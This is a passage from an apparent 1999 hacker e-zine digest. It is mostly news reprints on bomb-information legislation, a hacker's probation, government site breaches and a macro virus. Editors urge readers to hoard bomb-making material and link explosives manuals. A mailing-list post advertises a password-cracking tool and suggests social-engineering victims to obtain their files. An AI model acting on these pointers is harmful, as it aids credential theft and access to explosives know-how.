in the past five years. The bug explosion costs employers millions of hours in
lost productivity The insidious Melissa virus, which infected over 100,000
computers in the U.S., was a nuisance; weeks later the destructive CIH virus
crashed more than half a million computers in South Korea and Turkey
E-businesses are unwittingly exposing private customer information, including
names, addresses and credit card info; last month 100 sites with improperly
installed shopping carts were identified
HOW TO LIMIT YOUR VULNERABILITY
You can't prevent bugs, viruses and inept e-tailers. But there are ways to
protect yourself.
Your computer. If events of recent months didn't persuade you to obtain
anti-virus software for your PC, maybe this quick click to free, five-star
anti-virus downloads will do the trick. Click for more. Bookmark the Help
Channel's Bug section for the latest bug alerts, patches and workarounds for
your software and hardware. Click for more.
Your company. PC Magazine Labs evaluated three families of antivirus products
that protect every major LAN component. Click for more. If your company conducts
business over the Internet, two major security holes you need to plug are DNS
spoofing and attacks on dial-up connections. Click for more.
Your personal information. Make sure before you relinquish any personal
information the Web site has the TRUSTe seal of approval and/or a privacy
statement you can live with. Click for more. Or become a stealth browser; the
Help Channel details how to maintain a low profile on the Web. Click for more.
For even more resources, visit the Security and Privacy Briefing Centers I've
linked in the sidebar.
And please use the TalkBack button to tell me if you agree things are getting
worse, not better. You're also welcome to join the discussion at my Berst Alerts
forum.
[snip..]
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]
@HWA
41.0 Bombs Off The Net!
~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
Bombs Off the Net, Senate Says
contributed by g0rn
New legislation recently tacked onto the Violent and Repeat Juvenile Offender Accountability and
Rehabilitation Act will make 'bomb-making information' on the net illegal. The law would also apply
to any form of distribution--books, magazines, or videos. Well we suggest that you get copies of any
information you feel may be threatened now and sock it away.
C|Net
http://www.news.com/News/Item/0,4,36785,00.html?st.ne.fd.mdh.ni
textfiles.com- Get 'em while you can
http://www.textfiles.com/
Bombing victims held a press conferance yesterday to
plead with Internet companies to purge or block Web
sites that carry recipes for building bombs. How come
no one is protesting the local library or the High School
chemistry book? Why does everyone always pick on the
internet?
Nando Times
http://www.techserver.com/story/body/0,1634,50706-81476-578139-0,00.html
Wired
http://www.wired.com/news/news/politics/story/19785.html
Late Update
This information is fast disapearing from the web. The
above site textfiles.com has already removed the
relevent sections (at least temporarily) We suggest you
grab what you can while you can.
The Anarchists Cookbook
http://www.amazon.com/exec/obidos/ASIN/0962303208/thehackernewsnet
Highly Explosive Pyrotechnic Compositions
http://www.amazon.com/exec/obidos/ASIN/0873648277/thehackernewsnet
Homemade C-4 : A Recipe for Survival
http://www.amazon.com/exec/obidos/ASIN/0873645588/thehackernewsnet
Improvised Explosives : How to Make Your Own
http://www.amazon.com/exec/obidos/ASIN/0873643208/thehackernewsnet
303.org has graciously mirrored the missing sections
from textfiles.com. They are still working on it but some
stuff is available now.
303.org
http://www.303.org/explosives/
The stories;
C|Net;
Senate blasts bomb-making info on Net
By Courtney Macavinta
Staff Writer, CNET News.com
May 19, 1999, 1:00 p.m. PT
Distributing bomb-making information on the Net would be illegal in most cases under Senate legislation being
debated in the wake of the killings at Columbine High School in Littleton, Colorado, and a rash of subsequent threats
at campuses around the country.
With a 85-13 vote, Sens. Dianne Feinstein (D-California) and Orrin Hatch (R-Utah) successfully tacked an amendment onto the
Violent and Repeat Juvenile Offender Accountability and Rehabilitation Act yesterday. The provision prohibits teaching or
demonstrating how to make explosives with the "intent" that the information will be used to commit a federal crime.
The law would apply to any form of distribution--books, magazines, or videos, for example. However, like measures Feinstein has
pushed in the past, the Net is once again the focal point. That's because the two teenagers, who witnesses say killed 13 people
in Littleton, reportedly documented their weapon-making and massacre plans online.
"The youngsters in Colorado who perpetrated the crime indicated they got the formula for the pipe bombs directly from the
Internet," Feinstein stated on the Senate floor.
The same bill, which is still being debated today, also would require that Net access providers offer customers filtering
technologies and bans online gun or explosives sales that would violate existing laws.
But First Amendment experts are alarmed by the bomb-making provision. They say it could apply to people who aren't inciting
violence.
"If a high school chemistry teacher posts online material for a course that he knows could be used to build a device, it's entirely
possible that someone unknown to the teacher will use it to commit a federal crime of violence," said Barry Steinhardt, associate
director of the American Civil Liberties Union. "That is problematic, because on the Net you can't know the intent of your
audience."
But Hatch says to be prosecuted, publishers would have to encourage violence along with the posting of bomb-making data. The
Senator pointed to the Animal Liberation Front's Web site as an example of the type of material he wants to outlaw. The site has
a pamphlet, Final Nail #2, which includes diagrams about how to build devices to set off fire alarm sprinklers or to damage stores
that sell fur coats.
"It is a detailed guide to terrorist activities," Hatch said on the Senate floor.
"Why someone feels the need to put such harmful material on the Internet is beyond me; there certainly is no legitimate need for
our kids to know how to make a bomb," he added. "[If a] person crosses the line to advocate the use of that knowledge for violent
criminal purposes, or gives it out knowing it will be used for such purposes, then the law needs to cover that conduct."
Although the Hatch-Feinstein amendment targets only those whose "intent" is to incite violence, free speech watchdogs today
echoed concerns they have with a recent federal court decision in Oregon that held online speakers liable for inciting offline
violence.
In that case, U.S. District Judge Robert Jones issued a permanent injunction prohibiting a group of abortion foes from distributing
"wanted" posters that list abortion providers' personal information and redistributing the data on sites such as the Nuremberg
Files, which called for the "baby butchers" to be "brought to justice." The case is under appeal.
"What remains to be resolved by the courts is 'how far is too far' in making information available that could be used in the
commission of a crime," said David Sobel, general counsel at the Electronic Privacy Information Center.
"I have concerns about how the [bomb-making] language might be applied," he added. "Provisions like this are subject to abuse in
the hands of an overzealous prosecutor."
Still other legal experts said the amendment likely would pass constitutional tests.
"There are serious constitutional questions about regulating information about making bombs," said Lance Rose, author of
NetLaw. "If this law is passed and it survives any constitutional challenges, there will be a fundamental proposition that you can
regulate bomb information at least sometimes."
But Rose added: "It's a slippery slope. Once you have a law like this in place, the question is, 'How far can they go?'"
Despite the free speech debate, legal experts say lawmakers' campaigns to rid the Net of bomb-making information won't
necessarily help to curb access to such information.
"There is ample information available about this offline, including information from the Agricultural Department and U.S. military
training manuals," the ACLU's Steinhardt said. "The Net is a global medium--a lot of information also comes from outside of the
United States. This measure is totally futile."
-=-
Wired;
-=-
Victims Want Bomb Sites Off Web
Reuters
5:50 p.m. 19.May.99.PDT
The brother of convicted Unabomber Theodore Kaczynski, a victim of one of his bombings, and the mother of a victim
of the Oklahoma City bombing made a plea on Wednesday for Internet companies to purge or block Web sites
that carry recipes for building bombs.
David Kaczynski, Unabomber victim Gary Wright, and Marsha Kight, whose daughter died in the Oklahoma City blast,
appeared at a news conference to ask America Online, Microsoft, Walt Disney, and Yahoo to police the vast array of
Web sites on a voluntary basis.
Access to violent sites, particularly by children, has come under sharp focus since the Littleton, Colorado high school
shootings, where one of the teenage killers detailed the building of pipe bombs on the Web a year earlier.
David Kaczynski, who has made few public statements since he exposed his brother as the Unabomber, said that he
saw a parallel between his and his wife's decision to turn his brother in to authorities and the issue that faces
Internet companies.
"It was absolutely agonizing for us to make the decision to turn in my brother," said Kaczynski, a social worker in upstate
New York. "I think it's much less agonizing for Internet companies, and they ought to do it."
Wright, a Salt Lake City software executive, was injured when he picked up a Unabomber bomb behind a computer
store where he worked in 1987. Kight's 23-year-old daughter was among the 168 people who died in the 1995 bombing of
the Oklahoma City federal office building.
Writing letters to AOL, Microsoft, Disney - which is part owner of the Go Network -- and Yahoo, the victims and a New
York-based group called the Centre for Community Interest want host companies to scan for and delete bomb-making
instructions and to block access to such sites through search engines.
Industry spokesmen said that companies do what they can, but they questioned whether it is possible to scan the content
of every Web site, particularly if a bomb recipe, for example, contains just chemical ingredients and no violent or
hateful language.
Dennis Saffran, head of CCI, which also has defended pornography-shop restrictions and panhandling bans, said
that the call would not violate the constitutional right to free speech because they are seeking the voluntary
cooperation of private companies.
But, he added, limited government regulation might be needed if companies don't participate on a voluntary basis.
"We're giving every troubled kid out there the tools to become a Tim McVeigh or a Ted Kaczynski," he said.
@HWA
42.0 Dark Spyre may end up in jail
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
Dark Spyre May end up in Jail
contributed by erewhon
A year shy of completing his probation after being indicted on two counts of felony theft in January 1995,
Dark Spyre (Ryan David Schwartz) may soon end up behind bars. For several weeks in 1993-94 Dark Spyre
worked on breaking the codes of a long-distance phone company based in Mississippi. Part of his sentance for
these crimes was probation. Now his probation may be revoked. The Assistant District Attorney claims that he
violated his probation when he used a computer. Dark Spyre claims that the closest he has gotten to a
computer is when he asked a schoolmate to type a paper for him. Allowing someone else to use a computer
on Schwartz's behalf, is the same as if Schwartz had used it, the DA said.
ComputerNews Daily
http://199.97.97.16/IMDS%7CCND7%7Cread%7C/home/content/users/imds/feeds/nytsyn/1999/05/18/cndin/1297-0139-pat_nytimes%7C/home/content/users/imds/feeds/nytsyn/1999/05/18/cndin/1301-0143-pat_nytimes%7C/home/content/users/imds/feeds/nytsyn/1999/05/18/cndin/
Former Hacker in a Probation Struggle
PATTI MUCK
c.1999 Houston Chronicle
SUGAR LAND, Texas -- From the blackness of his bedroom, Dark
Spyre would be awakened by a desk lamp clicking on.
Hooked to his computer, it would signal him - sometimes in the middle
of the night - that a fellow hacker was ready to begin.
For several weeks in late 1993 and early 1994, Ryan David Schwartz,
alias Dark Spyre, was a high school senior by day, a computer hacker by
night. Breaking the security code of a long-distance phone company based in
Mississippi, he was able to charge thousands of dollars worth of computer
bulletin board calls to the company.
When Sugar Land police showed up at the Houston-area home he
shared with his grandparents and mother in March 1994, Schwartz
confessed to hacking. They took his computer, all of the components, even
the desk lamp.
Indicted on two counts of felony theft a month after his graduation, he
pleaded guilty in January 1995. He was sentenced to five years' deferred
adjudication - a punishment that would expunge the conviction from his
record if successfully completed - plus 450 hours of community service,
court costs and nearly $5,000 restitution.
Now, just a year shy of completing his probation, Schwartz faces a
motion to revoke the probation. Revocation could send him to prison and
end his pursuit of a degree at Baylor University in Waco.
From Schwartz's perspective, the Fort Bend County District
Attorney's Office set him up for failure from the start and has treated him
more like a violent criminal than an intelligent young man who made a mistake
and was willing to pay for it.
From the prosecutor's perspective, Schwartz has been thumbing his
nose at the court and deserves to be punished.
Not only has he ignored probation conditions that included orders not
to use a computer, but he has abused a string of second chances, Assistant
District Attorney Mike Elliott said.
``It's a shame in a lot of ways, because he's a bright kid,'' said Elliott,
who, coincidentally, is the computer expert in his office. ``But he just can't
leave it alone. He's got an addiction.''
Schwartz denied violating his probation. He insisted that he has been
walking the straight and narrow - working nearly full-time at a Service
Merchandise store in Waco, attending classes at Baylor and frantically
rushing back to Fort Bend County every Friday afternoon to meet with his
probation officer.
Sugar Land, an affluent community just outside of Houston, is about
150 miles from Waco.
He said he has not used a computer and that fellow students have
typed papers for him, which, according to his understanding of the probation,
was allowed.
Elliott said the ruling was clear: Schwartz is forbidden from using a
computer, period. Allowing someone else to use a computer on Schwartz's
behalf, and using Schwartz's password, is the same as if Schwartz had used
it, Elliott said.
``I'm just trying to get school done and get a degree and get a career
going,'' said Schwartz, now 23.
Elliott contended that Schwartz doesn't merit pity. Not only did
Schwartz ignore a warning from LDDS Metromedia Communications, the
long-distance company, to stop hacking long before the criminal charges
were filed, but he also violated his probation by accessing the Internet and
using a computer, the prosecutor said.
``It's a game to them,'' he said of computer hackers. ``They don't see
the danger, the real harm in what they're doing. Many people are under the
misconception that if you do a crime on the computer, it's not that bad, like
murdering somebody.
``But it is a crime - a felony crime. How many people's phone bills
went up because of acts he and others did? Everybody pays for his kind of
crime.''
Schwartz's probation problems started early, when he contended that
his severe asthma prevented him from the lawn-cutting and outdoor
maintenance chores that are typical of community service.
He had enrolled at the University of Houston in August 1994 and
attended classes there through May 1995. After his enrollment at Baylor in
July 1995, the community-service hours became more difficult to complete.
In September 1997, the first motion to revoke Schwartz's probation
was filed, alleging that he had failed to report to the probation department in
February, May and June 1996 and that he had failed to perform community
service. A probation department report said Schwartz hadn't done service
for a year.
It also maintained that, even after being referred to light duty because
of his asthma, Schwartz failed to report for community service in Waco.
He denied that, saying he had reported but wasn't given an assignment
compatible with his health.
At one point, he was instructed to clean out a dark, cellarlike room at a
Waco charitable organization, he said. It was, he said, infested with rats, an
environment his asthma was unable to tolerate.
He kept the job for only one day. A promised assignment in a library
never materialized.
``I was willing to do the work,'' he said.
After a hearing in December 1997, state District Judge Bradley Smith
did not revoke his probation but made several changes in its terms.
Schwartz was given an additional 600 hours of community service, to
be completed by Jan. 1, 1999. And he was forbidden from operating a
computer without written court permission.
Schwartz took off a semester and reported for work daily at the
Precinct 4 justice-of-the-peace office to complete his community service. His
mother, Linda Schwartz, a secretary, paid the restitution, and his
grandparents, Greta and Izu Schwartz, 71 and 73 respectively, helped pay
lawyer and bond fees.
Already, the family had stacked up about $50,000 in payments to bail
bondsmen and lawyers.
The family thought that the ordeal was nearing an end and that
Schwartz could finish college and get his degree in finance and management
information systems. He wants to have a career in financial consulting or
investments.
Schwartz applied for early termination of his probation after he
completed his community service, but was turned down.
Although the court granted his request to return to Baylor, he was told
to report to the probation office in Richmond at 4 p.m. every Friday.
Schwartz said he did his best to comply, leaving as soon as classes or work
were through and driving hard to make the deadline. But he was late three
times, clocking in at 4:25 p.m. one time, at 4:31 p.m. another time and at
4:16 p.m. another.
After using several lawyers, the family hired Houston attorney Dick
DeGuerin to try again to get the probation terminated early. Schwartz
obtained a letter from an associate dean at Baylor, saying he lacked 39 hours
to graduate and would have to have access to a computer to complete his
course work.
An assistant professor at Baylor wrote to Judge Smith, asking that
Schwartz be allowed to use a computer ``and move on to a career in
business.''
While supportive letters were filling Schwartz's court file, Elliott was
getting tips that the probationer was actively using the computer, the Internet
and e-mail at Baylor.
The second motion to revoke his probation was filed in March. It is set
for a June 10 hearing before Smith, who has a reputation around the
courthouse of being tough on wayward probationers.
The Schwartz family views the latest development as continued torture,
referring to Elliott as a persecutor instead of a prosecutor.
``The goal is to put him in jail. That's what they want,'' said Linda
Schwartz, 47. ``He was young and foolish,'' she said, but he has paid for his
mistake. ``Now we don't know what to do. We're going crazy.''
Elliott, meanwhile, is preparing for the hearing. If Schwartz's probation
is revoked, he could receive two to 10 years in prison.
``How many times can you thumb your nose at the court and get away
with it?'' Elliott asked. ``He would have had a very bright future with some
company. Why couldn't he do something constructive with his time instead of
trying to beat the system?''
-----
(The Houston Chronicle web site is at http://www.chron.com/ )
@HWA
43.0 ACTINIC ecommerce package claims to be 'unhackable'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
Actinic Catalog 3.0 called "Unhackable"
contributed by Weld Pond
Actinic Software LLC has Actinic Catalog 3.0, a plug-and-play e-commerce software package. The
company is making the claim that it uses unhackable technology. It almost sounds like an invitation.
Will people ever learn that nothing is unhackable? It all depends on time and energy. Something says
that the marketing department probably didn't run the press release by the engineers before they
released it.
Update: May 21st HNN rumours section reports that www.actinic.com was supposedly cracked...(unconfirmed)
Excite News
http://news.excite.com:80/news/bw/990517/nj-actinic-software
Actinic Catalog 3.0 Offers Total Security for Online Shopping; "Unhackable"
Technology Prevents Hackers from Accessing Online Ordering Information
Updated 9:53 AM ET May 17, 1999
EAST BRUNSWICK, N.J. (BUSINESS WIRE) - Actinic Software LLC, a leading provider of plug-and-play e-commerce
software, today announced that its flagship product, Actinic Catalog 3.0, offers total security for online shoppers.
Catalog 3.0 is a low-cost, easy-to-use software package that provides all the tools for e-commerce merchants to rapidly build
and deploy secure online stores. The software's military-strength security eliminates vulnerabilities for merchants and their
customers, ensuring that sensitive information cannot be compromised.
Recent breaches in e-commerce security have turned a critical eye to the safety of online shopping. Some platforms, whether
ill-equipped or improperly installed, save customer order information in a decrypted file on the server, exposed to anyone with
access to the Internet. This not only includes the experienced hacker, but the average Web surfer with the right search terms.
Unlike other third-party e-commerce systems, Catalog 3.0 encrypts all financial details on the Web server, which is deleted
once orders are downloaded to the merchant's PC. Using 128-bit encryption, approved for use by major banks, Catalog 3.0
guarantees complete protection for online shoppers.
"To avoid placing confidential customer information in jeopardy, e-commerce platforms must cover all the bases when it comes
to ensuring online security -- from protecting files stored on the Web server, to accounting for the possibility of human error,"
explained Kevin Grumball, CEO of Actinic Software. "Catalog offers an easy-to-use interface, and keeps sensitive information
encrypted at all times, eliminating all possible security hazards for online shoppers."
To ensure total e-commerce security, Catalog 3.0 encrypts sensitive data on the buyer's PC using a Java applet, and also
operates with SSL sites. Credit-card purchases are securely processed through the site using 128-bit encryption. Orders are
downloaded directly to the merchant's PC for processing. The Web server is used only as a mailbox, to which only the
merchant holds the key. No sensitive data is ever visible on the server, and all details are stored safely on the merchant's PC,
providing customers with the end-to-end security they need.
Catalog 3.0 offers all the components necessary to build a fully secure e-commerce site. The total solution includes a
Web-based catalog, electronic shopping cart, online ordering, expanded payment options, encrypted security, and more.
Catalog 3.0 is available now, priced at $399. Contact Actinic for more details.
About Actinic Software LLC
Founded in 1996, Actinic Software LLC is located in East Brunswick, N.J., with offices in the UK. The company develops
Internet commerce software solutions. Its flagship product, Actinic Catalog 3.0, is a secure, low-cost, and easy-to-use
plug-and-play solution for the rapid deployment and maintenance of an e-commerce site. Visit Actinic Software on the Web at
http://www.actinic.com.
Contact: Actinic Software, East Brunswick Kevin Grumball, 732/238-8007 kgrumball@actinic.com or Springboard Communications Kevin
McLaughlin, 732-863-1900 kmclaughlin@s-board.com
@HWA
44.0 MP3's off the net?
~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
MP3 Web sites to be Reported
contributed by Space Rogue
M. Ken Co., Ltd.,a developer of electronic water marking technology, will begin on June 1st to list web sites that
contain illegal MP3s. The company will offer these lists to companies that are seeking copyright infringements
on the web, it will also publish this information on its web site. The service will use an agent developed by M.
Ken. The agent can search and locate MP3 files on the Web. During a test over 400 illegal sites where found.
AsiaBiz Tech
http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID=onair/asabt/news/70746
@HWA
45.0 Free DNS!
~~~~~~~~~
From HNN http://www.hackernews.com/
FREE DNS!
contributed by ratko
IHN is a project being built to bring people free host names and URL forwarding as well as many more
features. Like the now defunct ml.org, IHN promises DNS for the masses. There is also free URL forwarding
hosts, and soon to come, IRC Proxying.
"Now you can go to any IRC server and have your domain show up as an IHN
domain. Currently in progress..." domains include ihn.org, clan.net and darpa.org ...
Internet Host Network
http://www.ihn.org
@HWA
46.0 pIRCHCrack cracks password in pirch.ini files
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Fri, 14 May 1999 04:56:55 PDT
Reply-To: Mike Arnold <mikey27@HOTMAIL.COM>
Sender: Bugtraq List <BUGTRAQ@netspace.org>
From: Mike Arnold <mikey27@HOTMAIL.COM>
Subject: pIRCH32/98 Exploit
To: BUGTRAQ@netspace.org
pIRCH version 32 and 98 save the users NickName password onto disk in
c:\pirch32\pirch.ini or c:\pirch98\pirch.ini depending on what version.
pIRCH Encrypts the password but i have released a program that can crack the
password if you supply the .ini you need to get the victims pirch.ini file
somehow maybe Social Engineering or whatever, then run pIRCHCrack against
it. The user may also use the same password for their ISP, E-mail ETC.
pIRCHCrack is available at
http://members.xoom.com/zaiman/pirchcrack.zip
--Mike
______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com
@HWA
47.0 NASA vulnerable to attack
~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
NASA Vulnerable To Attack
contributed by McIntyre
The General Accounting Office released a report yesterday (Thursday) that labels 135 of 155 of NASAs
mission-critical systems as not meeting the agency's own requirements for security. The GAO enlisted the
help of the NSA to simulate an attack on NASA using publicly available tools such as war dialers. Although
NASA performed an internal review of its information security policies last May that found many of the same
problems identified by the GAO, few of the recommended fixes had been implemented. Satellite command and
control systems as well as launch controls are not linked to the internet and where not at risk during
these simulated attacks.
MSNBC
http://www.msnbc.com/news/271662.asp
Federal Computer Week
http://www.fcw.com:80/pubs/fcw/1999/0517/web-nasa-5-20-99.html
MAY 20, 1999 . . . 17:20 EDT
Federal Computer Week
GAO unearths computer security weaknesses at
NASA
BY DIANE FRANK (dfrank@fcw.com)
Many of NASA's mission-critical information systems are vulnerable to
attack, and almost all the systems do not meet the agency's own requirements
for risk assessment, according to a General Accounting Office report released
today.
In tests conducted by GAO at one of NASA's field centers, experts were
able to penetrate several mission-critical systems, including one responsible for
calculating the positioning data for spacecraft.
"Having obtained access to these systems, we could have disrupted NASA's
ongoing command and control operations and stolen, modified or destroyed
system software and data," the report states.
GAO attributed much of the success of the attacks to NASA's lack of
consistent information security management and policies as suggested by
GAO's 1998 Executive Guide. And although NASA performed a special
review of its information security program last May that found many of the
same problems identified by GAO, few of the recommended fixes have been
started, according to the report.
GAO recommended that NASA put in place an agencywide security program
addressing five areas: assessing risks and evaluating needs; implementing
policies and controls; monitoring compliance with policy and effectiveness of
controls; providing computer security training; and coordinating responses to
security incidents.
@HWA
48.0 Vermont's Security Compromised
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by McIntyre
Yet another Cold Fusion hole is responsible for the security breeches of the web site of the state of
Vermont. Bob West, the state's deputy chief information officer, claimed the state's computers that contain
the home page and other public documents are not considered secure against computer attack. (There are
a lot of pretty funny, or pretty sad, quotes in this article.)
HNN Cracked Pages Archive
http://www.hackernews.com/archive/crackarch.html
The Boston Globe
http://www.boston.com/dailynews2/141/region/Hackers_get_into_state_of_VermP.shtml
Hackers get into state of Vermont computer system
By Wilson Ring, Associated Press, 05/21/99 09:48
MONTPELIER, Vt. (AP) - Hackers cracked into the state's computer system Thursday, inserting
at least three unauthorized messages into it.
State officials said they received no complaints from the public about anything that appeared on the
state's World Wide Web site.
A computer security official from Boston said that for at least four hours Thursday morning a visitor
to the state's home page was greeted by a page entitled ''Hackfactor X'' that contained a series of
profanities and the message, ''Well, I can see how well our tax dollars are being spent on computer
security.''
Hidden deep into the state's system, which is not readily accessible to the public, was another
message entitled ''A Changing World'' that was signed ''hacked for freedom,'' and another that
carried the caption, ''use this only for good, not evil.''
State officials were initially unaware of the assault on their computers. But once the location of the
messages were pointed out by The Associated Press they were erased within minutes.
Bob West, the state's deputy chief information officer, said there was no evidence the main Web
page was tampered with.
''I am not sure where that came from,'' West said of the report. ''I would have gotten e-mails like
crazy if that had happened.''
But he was also unaware that the less public files had been tampered with until they were pointed
out to him. ''Most people would never have found that,'' he said.
In any event, the state's computers that contain the home page and other public documents are not
considered secure against computer attack, West said.
''Anything on that box is backed up and is restorable and is not considered confidential,'' West said.
If the system failed, ''it wouldn't stop any operation in state government.''
Critical state business - such as personnel and tax records - is done on computers that are
protected by ''firewalls'' and are believed invulnerable to unauthorized access, West said.
The hacker took advantage of the software that runs the state's computer servers, said Weld Pond,
a computer security consultant with the Boston company l0pht. The vulnerability of the software has
been well known, but it was installed on many computer systems years ago and officials never
bothered to correct the problem, Pond said.
Pond looked at the state's page and said it appeared it was hacked twice on Thursday. The last
illegal visitor ''closed'' the hole that allowed the site to be hacked, he said.
''Hackers definitely close holes after they are in,'' Pond said ''They don't want somebody else in it.''
The attack on the state system was first reported on the computer Web site known as attrition.org.
The site is used to point out to the information industry how vulnerable computer systems can be
and to record those assaults for history.
B.K. DeLong of Boston helps maintain the site. He said he got an e-mail message at about 4:30
a.m. pointing out the assault on the Vermont system. He said the untraceable e-mail was probably
sent by the hacker, who wanted to highlight his or her achievement.
DeLong said he saw the Hackfactor X site at about 8:30. It had been taken off the state system by
about 9 a.m.
''They can insist all they want, but it's been seen,'' DeLong said of West's denial about the
tampering.
The site that DeLong said was posted in place of the state's traditional home page can still be
viewed at www.attrition.org/mirror/attrition.
Computer hacking is a federal crime, but Vermont's U.S. Attorney, Charles Tetzlaff, said Thursday
he was unaware of the assault on the state's home page
@HWA
49.0 NIST May Be Named Info Security Clearing House
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by erewhon
The House Science Committee will soon push to update the 1989 Computer Security Act. The new bill will
closely resemble the Computer Security Enhancement Act of 1997 which never made it out of the Senate.
This new legislation would tap the National Institute of Standards and Technology (NIST) as the lead agency
for information security. (What about NIPC, CERT, and the FBI? How many agencies do we need?) The new bill
also push for increased federal use of commercial off-the-shelf products for security needs.
Federal Computer Week
http://www.fcw.com/pubs/fcw/1999/0517/web-security-5-20-99.html
MAY 20, 1999 . . . 14:11 EDT
House panel aims to bolster security law
BY MARGRET JOHNSTON (margret_johnston@fcw.com)
WASHINGTON, D.C. -- The House Science Committee plans to make
another push to update a 1989 law that requires civilian agencies to take
measures to protect their computer systems, according to Rep. Constance
Morella (R-Md.), chairwoman of the Technology Subcommittee of the House
Science Committee.
The new bill, which could be introduced as early as next week, would revamp
the 10-year-old Computer Security Act. The bill will closely resemble the
Computer Security Enhancement Act of 1997, which the House passed only
to have it die in the Senate last year, said Morella, speaking at a symposium
sponsored by the SmartCard Forum.
Like the 1997 bill, the proposed legislation would tap the National Institute of
Standards and Technology as the lead agency for information security. The
preceding bill also would have required NIST to promote federal use of
commercial off-the-shelf products for civilian security needs.
The committee first began its effort to revamp the existing law to reflect the
proliferation of network technology that has left agency data more vulnerable
to corruption and theft, Morella said in 1997.
@HWA
50.0 097M.Tristate Macro Virus Contained
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by wdef-A
Symantec and Network Associates have posted new definitions to eradicate the 097M.Tristate macro virus.
This new virus also known as Triplicate and Crown cross-infects Microsoft Word documents, Excel
spreadsheets, and PowerPoint presentations. The virus has the ability to destroy data and removes
virus-warning protection from both Excel and Word.
PC World
http://www.pcworld.com/pcwtoday/article/0,1510,11064,00.html
Hunters Contain Office
Macro Virus
Symantec, McAfee inoculate for 097M.Tristate
macro virus.
by Christian McIntosh, PC World
May 20, 1999, 6:38 p.m. PT
The heat of the race to detect and nullify new viruses appears second only to the contest among virus
fighters to be first with the cure.
Two antivirus leaders, Symantec and Network Associates' McAfee division, have nabbed a new macro
virus that threatens files created by Microsoft Office applications. Both have posted new definitions that
detect and eradicate the 097M.Tristate macro virus.
You can download the new definitions for any Symantec antivirus product from LiveUpdate, the
company's antivirus service, which pushes virus updates to registered Symantec customers.
"It's a scheduled component that checks frequently for new virus threats," says Enrique Salem, Symantec's
chief technology officer.
Unregistered Symantec customers can get the new definitions from the Symantec AntiVirus Research
Center on the company's Web site.
You can also eradicate the 097M.Tristate virus using McAfee's VirusScan updated with the most recent
definition file, available on the company's Web site. VirusScan also will prompt you to periodically update
your virus definitions data.
"Trendy" Macro Viruses
Macro viruses similar to 097M.Tristate are popular among virus writers, according to Symantec officials.
The 097M.Tristate macro virus cross-infects Microsoft Word documents, Excel spreadsheets, and
PowerPoint presentations.
The 097M.Tristate virus creates a viral workbook called BOOK1 in the Excel startup directory. In PowerPoint,
097M.Tristate adds a viral module that's linked to the AutoShape object covering an entire slide. During its
final leg, 097M.Tristate replaces the content of an infected Word document with viral code.
Once considered the exclusive domain of research labs, macro viruses have transitioned into general
circulation. Despite its prolific reproduction, Symantec classifies 097M.Triplicate as rare, saying it has
yet to spread beyond the United States. The 097M.Tristate macro virus, also known as Triplicate and Crown, is
currently the eighth most common virus submitted to Symantec's lab. The company's Scan & Deliver system
has received 132 submissions of the 097M.Tristate virus in the past two weeks.
McAfee classifies 097M.Tristate as high risk. The virus apparently removes virus-warning protection from both
Excel and Word.
@HWA
51.0 "Hackers" Ruin Online Poll
~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by The Silicon Sorceror
According to the Toronto Star, "online hackers" used ballot stuffing to spoil an online poll to find the
popular winner of Ontario's political candidate debate. The poll was designed so that each person could vote
only once, but apparently it wasn't designed well enough and "some political junkies with computer skills had
the time to write programs defeating the precautions" (Translation: Somebody clicked their mouse button
about 5 times and banged out a script).
The Toronto Star
http://www.thestar.com/editorial/news/990520NEW15b_NA-WEB20.html (article moved)
52.0 DSC v1.01 Released
~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by {b|4iz3}
DSC v1.01 has been released. DSC is a new e-zine for
those who are learning the "first steps" into learning
computer security. A Good setup and easy read ablility
are among the best parts of this new e-zine. Get yours
today.
DSC v1.01 Released
http://bl4iz3.faithweb.com/hacking/
Sample article on 'free internet' access from the DSC website;
_________________________________________________________________________________________
| -- ---- |
| g3t fr33 1nt3rn3t 4cc3ss __ | | | \/ ||
| fr0m {b|4iz3} of the -=D3P SQU4D CR3W=- -- | | | /\ ||
| http://bl4iz3.faithweb.com/ -- ---- |
|_________________________________________________________________________________________|
| |
| ________________________________________________________________ |
| |\ ____________________________________________________________ /| |
| | |\ ________________________________________________________ /| | |
| | | | _________________ _______________ ________________ | | | |
| | | | |_______________ \| ____________|/ ______________| | | | |
| | | | \ | |____________/ / | | | |
| | | | | |_____________ | | | | | |
| | | | _______________/ /_____________| | \______________ | | | |
| | | | |_________________/|_______________|\________________| | | | |
| | | |________________________________________________________| | | |
| | |/__________________________________________________________\| | |
| |/______________________________________________________________\| |
| |
| ****************************************** |
| ******* -=D3P SQU4D CR3W=- ******* |
| ****************************************** |
| *** http://bl4iz3.faithweb.com *** |
| ****************************************** |
| *** th1s h4ck pr0v1d3d t0 y0u by: *** |
| * {b|4iz3}0f th3 -=D3P SQU4D CR3W=- *
|
| ****************************************** |
| |
| _________________________________________________________________________________ |
| |_________________________________________________________________________________| |
| |
| _________________________________________________________________________________ |
| | _____________________________________________________________________________ | |
| | | -- ---- | | |
| | | h0w t0 g3t fr33 1nt3rn3t 4cc3ss __ | | | \/ || | |
| | | br0ught t0 y0u by {b|4iz3}! -- | | | /\ || | |
| | | -- ---- | | |
| | |---------------------------------------------------------------------------- | | |
| | | | | |
| | | C:\>cd progra~1 | | |
| | | | | |
| | | C:\program files\> | | |
| | | | | |
| | | C:\program files\>NetZero.bat | | |
